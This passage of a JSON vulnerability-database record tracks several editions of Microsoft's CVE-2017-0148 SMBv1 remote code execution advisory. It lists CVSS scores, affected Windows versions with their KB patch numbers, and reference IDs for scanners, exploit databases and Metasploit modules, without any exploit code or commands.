"msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T09:06:54", "differentElements": ["msAffectedSoftware"], "edition": 85}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-01T12:45:41", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-01T12:45:41", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-10-01T12:45:41", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB3205401", "KB4012214", "KB3177186", "KB3212646", "KBMS16-110, 3187754", "KB3210721", "KB4012217", "KB4012212", "KB3210720", "KB3213986", "KB4012598", "KB4012215", "KB4013198", "KB3205409", "KB4012216", "KB4012606", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T12:45:41", "differentElements": ["msAffectedSoftware", "vendorCvss"], "edition": 86}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "7d21d22f517defccc35d772d05d77d29", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-04T22:46:36", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-04T22:46:36", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-10-04T22:46:36", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012215", "KB4012213", "KB4012606", "KB4012216", "KB4012598", "KB4013198", "KB3212646", "KB4013429", "KB3213986", "KB3210720", "KBMS16-110, 3187754", "KB3210721", "KB3177186", "KB3205409", "KB4012212", "KB4012217", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}}, "lastseen": "2021-10-04T22:46:36", "differentElements": ["msAffectedSoftware"], "edition": 87}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "8cf93b0e21b8d82dbbee6dec7e04b364", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-06T08:45:17", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-04T22:46:36", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-10-04T22:46:36", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012216", "KB4013198", "KB4012214", "KB3213986", "KB4012212", "KB3210721", "KB4012606", "KB4013429", "KB3210720", "KB3205409", "KB3212646", "KB3205401", "KB4012215", "KB4012598", 